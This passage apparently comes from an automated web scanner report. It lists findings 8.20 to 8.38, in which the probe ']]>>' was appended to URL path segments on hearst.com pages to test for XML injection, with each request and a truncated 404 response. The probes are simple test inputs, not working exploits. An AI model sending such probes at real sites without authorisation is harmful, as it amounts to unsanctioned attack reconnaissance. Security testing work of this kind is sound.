The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /about-hearst]]>>/corporate-george-r-hearst-jr.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:27 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1207

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.20. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /about-hearst/corporate-george-r-hearst-jr.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /about-hearst/corporate-george-r-hearst-jr.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:30 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1207

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.21. http://hearst.com/about-hearst/corporate-mark-e-aldam.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /about-hearst/corporate-mark-e-aldam.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /about-hearst]]>>/corporate-mark-e-aldam.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:30 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1253

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.22. http://hearst.com/about-hearst/corporate-mark-e-aldam.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /about-hearst/corporate-mark-e-aldam.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /about-hearst/corporate-mark-e-aldam.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:33 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1253

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.23. http://hearst.com/about-hearst/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /about-hearst/index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /about-hearst]]>>/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:11 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1163

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.24. http://hearst.com/about-hearst/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /about-hearst/index.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /about-hearst/index.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:15 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1163

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.25. http://hearst.com/flash/slideshow-newspapers.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /flash/slideshow-newspapers.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flash]]>>/slideshow-newspapers.swf HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:31 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.26. http://hearst.com/flash/slideshow-newspapers.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /flash/slideshow-newspapers.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flash/slideshow-newspapers.swf]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:35 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.27. http://hearst.com/newspapers/albany-times-union.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/albany-times-union.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers]]>>/albany-times-union.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/the-advocate.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:21 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1217

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.28. http://hearst.com/newspapers/albany-times-union.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/albany-times-union.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers/albany-times-union.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/the-advocate.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:25 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1217

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.29. http://hearst.com/newspapers/hearst-news-service.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/hearst-news-service.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers]]>>/hearst-news-service.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/seattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:43 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1217

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.30. http://hearst.com/newspapers/hearst-news-service.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/hearst-news-service.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers/hearst-news-service.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/seattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:46 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1217

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.31. http://hearst.com/newspapers/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers]]>>/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/press-room/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:03 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.32. http://hearst.com/newspapers/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/index.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers/index.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/press-room/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:10 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.33. http://hearst.com/newspapers/localedge.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/localedge.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers]]>>/localedge.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/hearst-news-service.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:57 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1231

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.34. http://hearst.com/newspapers/localedge.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/localedge.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers/localedge.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/hearst-news-service.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:25:03 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1231

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.35. http://hearst.com/newspapers/metrix4media.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/metrix4media.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers]]>>/metrix4media.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/localedge.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:27:33 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1211

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.36. http://hearst.com/newspapers/metrix4media.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/metrix4media.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers/metrix4media.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/localedge.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:27:36 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1211

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.37. http://hearst.com/newspapers/seattlepicom.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/seattlepicom.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers]]>>/seattlepicom.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/albany-times-union.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:36 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1229

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.38. http://hearst.com/newspapers/seattlepicom.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/seattlepicom.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers/seattlepicom.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/albany-times-union.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:39 GMT
